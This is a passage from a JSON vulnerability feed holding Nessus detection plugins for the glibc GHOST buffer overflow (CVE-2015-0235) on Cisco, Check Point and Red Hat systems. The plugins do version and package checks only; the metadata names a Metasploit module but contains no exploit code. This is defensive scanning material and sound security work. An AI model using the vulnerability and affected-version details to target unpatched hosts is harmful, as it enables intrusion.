TRUE;\n\nif (vuln)\n{\n report =\n '\\n Cisco bug ID : ' + bug +\n '\\n Installed release : ' + version +\n '\\n Fixed release : ' + fix +\n '\\n';\n security_report_v4(port:0, extra:report, severity:SECURITY_HOLE);\n}\nelse audit(AUDIT_INST_VER_NOT_VULN, \"Cisco NX-OS software\", version);\n", "cvss": {"score": 10, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-09-11T01:40:58", "description": "The remote Cisco device is running a version of Cisco IOS XR software that is potentially affected by a heap-based buffer overflow vulnerability in the GNU C Library (glibc) due to improperly validated user-supplied input to the __nss_hostname_digits_dots(), gethostbyname(), and gethostbyname2() functions. This allows a remote attacker to cause a buffer overflow, resulting in a denial of service condition or the execution of arbitrary code.\n\nNote that this issue only affects Cisco Network Convergence System 6000 Series routers.", "cvss3": {"score": null, "vector": null}, "published": "2015-03-02T00:00:00", "type": "nessus", "title": "Cisco IOS XR GNU C Library (glibc) Buffer Overflow (GHOST)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2015-0235"], "modified": "2021-04-08T00:00:00", "cpe": ["cpe:/o:cisco:ios_xr"], "id": "CISCO-SA-20150128-GHOST-IOSXR_NCS6K.NASL", "href": "https://www.tenable.com/plugins/nessus/81596", "sourceData": "#TRUSTED 2bab4c2e8dd04360f36373efc45585d7a04f28fe49a09709edf37a96992be6a1071b8be5caf474f7b3891f9fd6d7418be0ee05638307846d1ef936233876d0e5ed93e215a8147d9f425a515c7dd28f89062aa13a479e59c18d0864c745e07a249a7b620fef8936000a2e61f44e457b072c7d5645b3878d09103689fd374339b6c44ff5141b708d9b300fbbc24254ce0c13d57206283e2fbe481f11d3761e4fcd4b41914d83ecbcae5cc9bcbb104b76f7ef33e9376832018894203162eb2867a0dea2d3c1060d15a7f79b12a9f2f74c21e9fbec9c109f4129b9a23a31631d019dd76957e9e038b0a67cb06c56c9482f76cccfc4f872e6fc2c051812e2afce2ecf6aabb14714cef10a104181c3a419b19c41fd3d1a28a7dd39e87da5510f5d2d53b7eb7d2f0f7b646bd87728f1b6f89b694e3179aae4269b473fa62f9f612a807a880912b39b6e13cc9542ce719236787ddfdd10d1fe31eef832c6d2924916a4f465805619909dd6d5b0ac42c1ef4618e6f9460cf26673cb0220147490bedf825387fe826378f8f3ebabccd7f87d9b7fc15b932462020baaf1914bf03e38d0b6b9f24ae8cbcf450a4c4fe539e1b09603a9deb4b2df8db292c5da66c4d105048714ae272f6a2c2650e4b815be6f4fd43d0f9b451349a398aadd6baa8e303a642d75abf3cbfa8d84ab3b98aea90ef77e59922a6390886844add7f0e5ce1a9b54d9ec\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(81596);\n script_version(\"1.12\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/04/08\");\n\n script_cve_id(\"CVE-2015-0235\");\n script_bugtraq_id(72325);\n script_xref(name:\"CERT\", value:\"967332\");\n script_xref(name:\"CISCO-BUG-ID\", value:\"CSCus69517\");\n script_xref(name:\"CISCO-SA\", value:\"cisco-sa-20150128-ghost\");\n\n script_name(english:\"Cisco IOS XR GNU C Library (glibc) Buffer Overflow (GHOST)\");\n script_summary(english:\"Checks the IOS XR version.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote device is missing a vendor-supplied security patch.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Cisco device is running a version of Cisco IOS XR software\nthat is potentially affected by a heap-based buffer overflow\nvulnerability in the GNU C Library (glibc) due to improperly\nvalidated user-supplied input to the __nss_hostname_digits_dots(),\ngethostbyname(), and gethostbyname2() functions. This allows a remote\nattacker to cause a buffer overflow, resulting in a denial of service\ncondition or the execution of arbitrary code.\n\nNote that this issue only affects Cisco Network Convergence System\n6000 Series routers.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://tools.cisco.com/bugsearch/bug/CSCus69517\");\n # https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20150128-ghost\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?fd2144f8\");\n # https://www.qualys.com/research/security-advisories/GHOST-CVE-2015-0235.txt\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?c7a6ddbd\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply the relevant patch referenced in Cisco bug ID CSCus69517.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2015-0235\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Exim GHOST (glibc gethostbyname) Buffer Overflow');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2015/01/27\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/02/18\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/03/02\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"combined\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:cisco:ios_xr\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"CISCO\");\n\n script_copyright(english:\"This script is Copyright (C) 2015-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"cisco_ios_xr_version.nasl\");\n script_require_keys(\"Host/Cisco/IOS-XR/Version\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"cisco_func.inc\");\ninclude(\"cisco_kb_cmd_func.inc\");\n\ndevice_name = \"Cisco Network Convergence System 6000 Series Router\";\n\n# Check model\nmodel = get_kb_item(\"CISCO/model\");\nif(\n !isnull(model)\n &&\n tolower(model) !~ \"ncs(6008|6k)\"\n) audit(AUDIT_HOST_NOT, device_name);\n\n# First source failed, try another source\nif (isnull(model))\n{\n model = get_kb_item_or_exit(\"Host/Cisco/IOS-XR/Model\");\n if (\n \"NCS6008\" >!< model\n &&\n \"NCS6k\" >!< model\n ) audit(AUDIT_HOST_NOT, device_name);\n}\n\n# Check rough version\n# 5.2.x / 5.4.x\nversion = get_kb_item_or_exit(\"Host/Cisco/IOS-XR/Version\");\nif (version !~ \"^5\\.[24]\\.\")\n audit(AUDIT_HOST_NOT, device_name + \" 5.2.x / 5.4.x\");\n\nport = get_kb_item(\"Host/Cisco/IOS-XR/Port\");\nif(empty_or_null(port))\n port = 0;\n\n# Affected :\n# 5.2.4.BASE, i.e., 5.2.4\n# 5.4.0.BASE, i.e., 5.4.0\nif (\n version == \"5.2.4\"\n ||\n version == \"5.4.0\"\n)\n{\n if (report_verbosity > 0)\n {\n report =\n '\\n Cisco bug ID : CSCus69517' +\n '\\n Installed release : ' + version +\n '\\n';\n security_hole(port:port, extra:report);\n }\n else security_hole(port:port);\n}\nelse audit(AUDIT_INST_VER_NOT_VULN, device_name, version);\n", "cvss": {"score": 10, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-04-12T15:46:18", "description": "According to its self-reported version, the remote Cisco Unified Communications Manager (CUCM) device is affected by a heap-based buffer overflow in the GNU C Library (glibc) due to improperly validating user-supplied input in the glibc functions\n__nss_hostname_digits_dots(), gethostbyname(), and gethostbyname2().\nThis allows a remote attacker to cause a buffer overflow, resulting in a denial of service condition or the execution of arbitrary code.", "cvss3": {"score": null, "vector": null}, "published": "2015-02-26T00:00:00", "type": "nessus", "title": "Cisco Unified Communications Manager Remote Buffer Overflow (CSCus66650) (GHOST)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2015-0235"], "modified": "2022-04-11T00:00:00", "cpe": ["cpe:/a:cisco:unified_communications_manager"], "id": "CISCO_CUCM_CSCUS66650-GHOST.NASL", "href": "https://www.tenable.com/plugins/nessus/81546", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(81546);\n script_version(\"1.15\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/04/11\");\n\n script_cve_id(\"CVE-2015-0235\");\n script_bugtraq_id(72325);\n script_xref(name:\"CISCO-BUG-ID\", value:\"CSCus66650\");\n script_xref(name:\"CERT\", value:\"967332\");\n\n script_name(english:\"Cisco Unified Communications Manager Remote Buffer Overflow (CSCus66650) (GHOST)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote device is affected by a buffer overflow vulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to its self-reported version, the remote Cisco Unified\nCommunications Manager (CUCM) device is affected by a heap-based\nbuffer overflow in the GNU C Library (glibc) due to improperly\nvalidating user-supplied input in the glibc functions\n__nss_hostname_digits_dots(), gethostbyname(), and gethostbyname2().\nThis allows a remote attacker to cause a buffer overflow, resulting in\na denial of service condition or the execution of arbitrary code.\");\n # https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20150128-ghost\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?fd2144f8\");\n # https://www.qualys.com/research/security-advisories/GHOST-CVE-2015-0235.txt\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?c7a6ddbd\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply the relevant patch referenced in the Cisco bug advisory.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2015-0235\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Exim GHOST (glibc gethostbyname) Buffer Overflow');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2015/01/12\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/02/24\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/02/26\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"combined\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:cisco:unified_communications_manager\");\n script_set_attribute(attribute:\"thorough_tests\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"CISCO\");\n\n script_copyright(english:\"This script is Copyright (C) 2015-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"cisco_ucm_detect.nbin\");\n script_require_keys(\"Host/Cisco/CUCM/Version\", \"Host/Cisco/CUCM/Version_Display\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\n\nver = get_kb_item_or_exit(\"Host/Cisco/CUCM/Version\");\nver_display = get_kb_item_or_exit(\"Host/Cisco/CUCM/Version_Display\");\napp_name = \"Cisco Unified Communications Manager (CUCM)\";\n\nfixed_ver = FALSE;\n\n# Advisory says 7.1.5 - 10.5.2\nif(ver =~ \"^7\\.\" &&\n ver_compare(ver:ver, fix:\"7.1.5\", strict:FALSE) >= 0 &&\n ver_compare(ver:ver, fix:\"8.0.0\", strict:FALSE) < 0\n )\n fixed_ver = \"8.6.1.20013.3\";\nelse if(ver =~ \"^8\\.\" && ver_compare(ver:ver, fix:\"8.6.1.20013.3\", strict:FALSE) < 0)\n fixed_ver = \"8.6.1.20013.3\";\nelse if(ver =~ \"^8\\.6\\.2\\.\" && ver_compare(ver:ver, fix:\"8.6.2.26158.1\", strict:FALSE) < 0)\n fixed_ver = \"8.6.2.26158.1\";\nelse if(ver =~ \"^10\\.0\\.\" && ver_compare(ver:ver, fix:\"10.0.1.13015.1\", strict:FALSE) < 0)\n fixed_ver = \"10.0.1.13015.1\";\nelse if(ver =~ \"^10\\.5\\.\" && ver_compare(ver:ver, fix:\"10.5.2.11008.1\", strict:FALSE) < 0)\n fixed_ver = \"10.5.2.11008.1\";\nelse if(ver =~ \"^11\\.0\\.\" && ver_compare(ver:ver, fix:\"11.0.0.98000.89\", strict:FALSE) < 0)\n fixed_ver = \"11.0.0.98000.89\";\nelse if(ver =~ \"^9\\.1\\.\" && ver_compare(ver:ver, fix:\"9.1.2.13078.1\", strict:FALSE) < 0)\n fixed_ver = \"9.1.2.13078.1\";\nelse\n audit(AUDIT_INST_VER_NOT_VULN, app_name, ver_display);\n\n\nif (report_verbosity > 0)\n{\n report =\n '\\n Cisco bug ID : CSCus66650' +\n '\\n Installed release : ' + ver_display +\n '\\n Fixed release : ' + fixed_ver +\n '\\n';\n security_hole(port:0, extra:report);\n}\nelse security_hole(0);\n", "cvss": {"score": 10, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-09-11T01:02:15", "description": "The remote host is running a version of Gaia OS which is affected by a heap buffer overflow vulnerability in glibc which could potentially allow an attacker execute arbitrary code in the context of the user running the affected application.", "cvss3": {"score": 7.3, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L"}, "published": "2017-12-04T00:00:00", "type": "nessus", "title": "Check Point Gaia Operating Remote Heap Buffer Overflow (sk104443)(GHOST)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2015-0235"], "modified": "2019-11-12T00:00:00", "cpe": ["cpe:/o:check_point:gaia_os"], "id": "CHECK_POINT_GAIA_SK104443.NASL", "href": "https://www.tenable.com/plugins/nessus/104998", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(104998);\n script_version(\"1.4\");\n script_cvs_date(\"Date: 2019/11/12\");\n\n script_cve_id(\"CVE-2015-0235\");\n script_bugtraq_id(72325);\n\n script_name(english:\"Check Point Gaia Operating Remote Heap Buffer Overflow (sk104443)(GHOST)\");\n script_summary(english:\"Checks the version of Gaia OS.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote host is missing a vendor-supplied security patch.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote host is running a version of Gaia OS which is affected by\na heap buffer overflow vulnerability in glibc which could potentially\nallow an attacker execute arbitrary code in the context of the user\nrunning the affected application.\");\n # https://supportcenter.checkpoint.com/supportcenter/portal?eventSubmit_doGoviewsolutiondetails=&solutionid=sk104443&partition=General&product=Security\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?ba5b918a\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update to an unaffected version or apply vendor-supplied hotfix.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2015-0235\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Exim GHOST (glibc gethostbyname) Buffer Overflow');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2015/01/27\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/01/27\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/12/04\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:check_point:gaia_os\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Firewalls\");\n\n script_copyright(english:\"This script is Copyright (C) 2017-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"check_point_gaia_os_version.nbin\");\n script_require_keys(\"Host/Check_Point/version\", \"Host/Check_Point/installed_hotfixes\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\n\napp_name = \"Gaia Operating System\";\nversion = get_kb_item_or_exit(\"Host/Check_Point/version\");\nhfs = get_kb_item_or_exit(\"Host/Check_Point/installed_hotfixes\");\nvuln = FALSE;\n\nif (version =~ \"R7[01]\")\n{\n vuln = TRUE;\n fix = \"Upgrade to an unaffected version or contact Checkpoint support.\";\n}\nelse if (version =~ \"R75\\.4[0567]\" || version =~ \"R76\" || version =~ \"R77(\\.[12]0)?$\")\n{\n if(\"sk104443\" >!< hfs)\n vuln = TRUE;\n fix = \"Apply hotfix sk104443\";\n}\nelse\n audit(AUDIT_DEVICE_NOT_VULN, \"The remote device running \" + app_name + \" (version \" + version + \")\");\n\nif(vuln)\n{\n report =\n '\\n Installed version : ' + version +\n '\\n Fix : ' + fix +\n '\\n';\n security_report_v4(port:0, severity:SECURITY_HOLE, extra:report);\n}\nelse audit(AUDIT_DEVICE_NOT_VULN, \"The remote device running \" + app_name + \" (version \" + version + \")\");\n", "cvss": {"score": 10, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-09-11T01:42:01", "description": "Updated glibc packages that fix one security issue are now available for Red Hat Enterprise Linux 5.\n\nRed Hat Product Security has rated this update as having Critical security impact. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available from the CVE link in the References section.\n\nThe glibc packages provide the standard C libraries (libc), POSIX thread libraries (libpthread), standard math libraries (libm), and the Name Server Caching Daemon (nscd) used by multiple programs on the system. Without these libraries, the Linux system cannot function correctly.\n\nA heap-based buffer overflow was found in glibc's\n__nss_hostname_digits_dots() function, which is used by the gethostbyname() and gethostbyname2() glibc function calls. A remote attacker able to make an application call either of these functions could use this flaw to execute arbitrary code with the permissions of the user running the application. (CVE-2015-0235)\n\nRed Hat would like to thank Qualys for reporting this issue.\n\nAll glibc users are advised to upgrade to these updated packages, which contain a backported patch to correct this issue.", "cvss3": {"score": null, "vector": null}, "published": "2015-01-28T00:00:00", "type": "nessus", "title": "RHEL 5 : glibc (RHSA-2015:0090) (GHOST)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2015-0235"], "modified": "2019-10-24T00:00:00", "cpe": ["p-cpe:/a:redhat:enterprise_linux:glibc", "p-cpe:/a:redhat:enterprise_linux:glibc-common", "p-cpe:/a:redhat:enterprise_linux:glibc-debuginfo", "p-cpe:/a:redhat:enterprise_linux:glibc-debuginfo-common", "p-cpe:/a:redhat:enterprise_linux:glibc-devel", "p-cpe:/a:redhat:enterprise_linux:glibc-headers", "p-cpe:/a:redhat:enterprise_linux:glibc-utils", "p-cpe:/a:redhat:enterprise_linux:nscd", "cpe:/o:redhat:enterprise_linux:5"], "id": "REDHAT-RHSA-2015-0090.NASL", "href": "https://www.tenable.com/plugins/nessus/81033", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2015:0090. The text \n# itself is copyright (C) Red Hat, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(81033);\n script_version(\"1.20\");\n script_cvs_date(\"Date: 2019/10/24 15:35:39\");\n\n script_cve_id(\"CVE-2015-0235\");\n script_xref(name:\"CERT\", value:\"967332\");\n script_xref(name:\"RHSA\", value:\"2015:0090\");\n\n script_name(english:\"RHEL 5 : glibc (RHSA-2015:0090) (GHOST)\");\n script_summary(english:\"Checks the rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Red Hat host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Updated glibc packages that fix one security issue are now available\nfor Red Hat Enterprise Linux 5.\n\nRed Hat Product Security has rated this update as having Critical\nsecurity impact. A Common Vulnerability Scoring System (CVSS) base\nscore, which gives a detailed severity rating, is available from the\nCVE link in the References section.\n\nThe glibc packages provide the standard C libraries (libc), POSIX\nthread libraries (libpthread), standard math libraries (libm), and the\nName Server Caching Daemon (nscd) used by multiple programs on the\nsystem. Without these libraries, the Linux system cannot function\ncorrectly.\n\nA heap-based buffer overflow was found in glibc's\n__nss_hostname_digits_dots() function, which is used by the\ngethostbyname() and gethostbyname2() glibc function calls. A remote\nattacker able to make an application call either of these functions\ncould use this flaw to execute arbitrary code with the permissions of\nthe user running the application. (CVE-2015-0235)\n\nRed Hat would like to thank Qualys for reporting this issue.\n\nAll glibc users are advised to upgrade to these updated packages,\nwhich contain a backported patch to correct this issue.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/errata/RHSA-2015:0090\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2015-0235\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:H/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Exim GHOST (glibc gethostbyname) Buffer Overflow');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:glibc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:glibc-common\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:glibc-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:glibc-debuginfo-common\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:glibc-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:glibc-headers\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:glibc-utils\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:nscd\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:5\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/01/27\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/01/28\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2015-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Red Hat\" >!< release) audit(AUDIT_OS_NOT, \"Red Hat\");\nos_ver = eregmatch(pattern: \"Red Hat Enterprise Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Red Hat\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^5([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Red Hat 5.x\", \"Red Hat \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"s390\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Red Hat\", cpu);\n\nyum_updateinfo = get_kb_item(\"Host/RedHat/yum-updateinfo\");\nif (!empty_or_null(yum_updateinfo)) \n{\n rhsa = \"RHSA-2015:0090\";\n yum_report = redhat_generate_yum_updateinfo_report(rhsa:rhsa);\n if (!empty_or_null(yum_report))\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : yum_report \n );\n exit(0);\n }\n else\n {\n audit_message = \"affected by Red Hat security advisory \" + rhsa;\n audit(AUDIT_OS_NOT, audit_message);\n }\n}\nelse\n{\n flag = 0;\n if (rpm_check(release:\"RHEL5\", reference:\"glibc-2.5-123.el5_11.1\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"glibc-common-2.5-123.el5_11.1\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"s390x\", reference:\"glibc-common-2.5-123.el5_11.1\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"glibc-common-2.5-123.el5_11.1\")) flag++;\n if (rpm_check(release:\"RHEL5\", reference:\"glibc-debuginfo-2.5-123.el5_11.1\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"glibc-debuginfo-common-2.5-123.el5_11.1\")) flag++;\n if (rpm_check(release:\"RHEL5\", reference:\"glibc-devel-2.5-123.el5_11.1\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"glibc-headers-2.5-123.el5_11.1\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"s390x\", reference:\"glibc-headers-2.5-123.el5_11.1\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"glibc-headers-2.5-123.el5_11.1\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"glibc-utils-2.5-123.el5_11.1\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"s390x\", reference:\"glibc-utils-2.5-123.el5_11.1\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"glibc-utils-2.5-123.el5_11.1\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"nscd-2.5-123.el5_11.1\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"s390x\", reference:\"nscd-2.5-123.el5_11.1\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"nscd-2.5-123.el5_11.1\")) flag++;\n\n if (flag)\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get() + redhat_report_package_caveat()\n );\n exit(0);\n }\n else\n {\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"glibc / glibc-common / glibc-debuginfo / glibc-debuginfo-common / etc\");\n }\n}\n", "cvss": {"score": 7.6, "vector": "AV:N/AC:H/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-09-11T01:40:07", "description": "The remote Cisco device is running a version of Cisco IOS XE software that is affected by a heap-based buffer overflow vulnerability in the GNU C Library (glibc) due to improperly validated user-supplied input to the __nss_hostname_digits_dots(), gethostbyname(), and gethostbyname2() functions. This allows a remote attacker to cause a buffer overflow, resulting in a denial of service condition or the execution of arbitrary code.\n\nNote that only the following devices are listed as affected :\n\n - Cisco ASR 1000 Series Aggregation Services Routers\n - Cisco ASR 920 Series Aggregation Services Routers\n - Cisco ASR 900 Series Aggregation Services Routers\n - Cisco 4400 Series Integrated Services Routers\n - Cisco 4300 Series Integrated Services Routers\n - Cisco Cloud Services Router 1000V Series", "cvss3": {"score": null, "vector": null}, "published": "2015-03-02T00:00:00", "type": "nessus", "title": "Cisco IOS XE GNU C Library (glibc) Buffer Overflow (CSCus69732) (GHOST)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2015-0235"], "modified": "2019-11-25T00:00:00", "cpe": ["cpe:/o:cisco:ios_xe"], "id": "CISCO-SA-20150128-GHOST-IOSXE_MULTI.NASL", "href": "https://www.tenable.com/plugins/nessus/81594", "sourceData": "#TRUSTED 